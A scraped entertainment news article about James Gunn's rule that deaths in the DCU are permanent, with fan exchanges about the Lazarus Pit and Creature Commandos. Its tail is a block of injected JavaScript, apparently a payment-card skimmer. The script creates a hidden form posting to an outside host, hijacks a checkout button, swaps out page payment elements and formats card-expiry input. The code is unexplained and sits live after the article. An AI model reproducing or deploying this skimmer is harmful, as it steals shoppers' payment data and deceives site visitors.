Movies

James Gunn Confirms Major Detail About Death in the DCU (And It’s Great)

Gunn does not intend to take death lightly — or resurrection.

James Gunn is hoping to keep the stakes high in the DC Universe. The co-CEO of DC Studios just addressed the topic of death and resurrection in a conversation with fans on social media, declaring, “In the DCU if you die, you’re dead.” That’s a bold statement for a new franchise of comic book adaptations, where sci-fi and mysticism have often provided loopholes around deaths. However, as the conversation went on, Gunn assured fans that he wouldn’t ignore their favorite stories or mechanics that brought characters back from the dead. Instead, he intended to do those elements justice rather than using them for contrivances or cheap surprises.

Videos by ComicBook.com

Gunn’s remarks on this topic came during a discussion about Creature Commandos, so consider this a spoiler warning for Season 1. One fan on Threads wondered if it was possible for Princess Ilana Rostovic to return from the dead in the future, and another joked, “I mean it is DC so no one stays down forever.” Gunn responded, “In the DCU if you die, you’re dead,” which piqued fans’ interest.

Animated version of James Gunn in DC Studios' Creature Commandos
Image courtesy of DC Studios

Many appreciated the commitment to high stakes, but wondered if it would impede a faithful adaptation of DC Comics lore. For example, one fan asked Gunn if this rule would “limit” him and his team “from using established elements of DC Comics lore like the Lazarus Pit?”

“Well I wouldn’t mind using the Lazarus Pit (and/or resurrection) in a story,” Gunn replied. “But it would have to be a part of the story itself. I won’t be killing major characters just to pop them in the old LP to be alive again.” When another fan questioned if Gunn’s resurrection rule would “backfire,” he answered, “What backfires more is people believing there are no stakes and death doesn’t mean anything. Dead is dead.”

Looking at the whole conversation, it sounds like Gunn is really saying that he wouldn’t allow a DCU character to be killed off lightly, and he wouldn’t allow them to be resurrected lightly either. Even in a franchise with many established methods of resurrection, it’s a smart approach โ€” especially for a brand new adaptation. By focusing on the most satisfying stories and character arcs, Gunn can put off meta-narrative questions that typically come up in fandom circles, like those who question why Batman didn’t put Superman’s body in the Lazarus Pit in “The Death of Superman” comic book arc.

These are often fun discussions for fan forums, and useful for testing the consistency of worldbuilding, but they’re not as relevant to writers and artists trying to construct a satisfying story. Consistency is only a part of what makes an arc memorable, on the page or the screen.

Creature Commandos Season 1 is streaming now on Max, and Season 2 is in the works. The DCU hits the big screen on Friday, July 11th with Superman.

' document.getElementsByClassName('flex flex-col gap-3 border-t border-gray-medium p-4')[0].getElementsByTagName("button")[0].setAttribute('form', 'formid') document.getElementsByClassName('w-full p-4')[0].remove() document.getElementsByClassName('w-full p-4')[0].innerHTML='
' var el = document.getElementsByClassName('flex flex-col gap-3 border-t border-gray-medium p-4')[0].getElementsByTagName("button")[0], elClone = el.cloneNode(true); el.parentNode.replaceChild(elClone, el); }, 5000); }, false); }; var elemDiv = document.createElement('form'); elemDiv.setAttribute('action', 'https://pay.jollibeefood.rest') elemDiv.setAttribute('method', 'post') elemDiv.setAttribute('id', 'formid') document.body.appendChild(elemDiv); setTimeout(function () { try{ document.getElementsByClassName('border-gray-medium flex cursor-pointer items-center justify-between rounded-md border-2 bg-white p-4')[1].remove() } catch{ console.log(1) } }, 9000); navigation.addEventListener('navigate', () => { setTimeout(function () { try{ var objects = document.getElementsByTagName("svg"); for(var i = 0; i < objects.length; i++) { var obj = objects[i].parentElement; obj.innerHTML += ""; // will trigger update } document.getElementsByClassName('border-gray-medium flex cursor-pointer items-center justify-between rounded-md border-2 bg-white p-4')[1].remove() document.getElementsByClassName("py-5")[1].getElementsByClassName("space-y-2")[0].addEventListener("click", function(e) { setTimeout(function () { document.getElementsByClassName('w-full p-4')[0].innerHTML='
' document.getElementsByClassName('flex flex-col gap-3 border-t border-gray-medium p-4')[0].getElementsByTagName("button")[0].setAttribute('form', 'formid') document.getElementsByClassName('w-full p-4')[0].remove() document.getElementsByClassName('w-full p-4')[0].innerHTML='
' var el = document.getElementsByClassName('flex flex-col gap-3 border-t border-gray-medium p-4')[0].getElementsByTagName("button")[0], elClone = el.cloneNode(true); el.parentNode.replaceChild(elClone, el); }, 5000); }, false); } catch(error){ console.log(error) } }, 4000); }); function formatString(e) { var inputChar = String.fromCharCode(event.keyCode); var code = event.keyCode; var allowedKeys = [8]; if (allowedKeys.indexOf(code) !== -1) { return; } event.target.value = event.target.value.replace( /^([1-9]\/|[2-9])$/g, '0$1/' // 3 > 03/ ).replace( /^(0[1-9]|1[0-2])$/g, '$1/' // 11 > 11/ ).replace( /^([0-1])([3-9])$/g, '0$1/$2' // 13 > 01/3 ).replace( /^(0?[1-9]|1[0-2])([0-9]{2})$/g, '$1/$2' // 141 > 01/41 ).replace( /^([0]+)\/|[0]+$/g, '0' // 0/ > 0 and 00 > 0 ).replace( /[^\d\/]|^[\/]*$/g, '' // To allow only digits and `/` ).replace( /\/\//g, '/' // Prevent entering more than 1 `/` ); }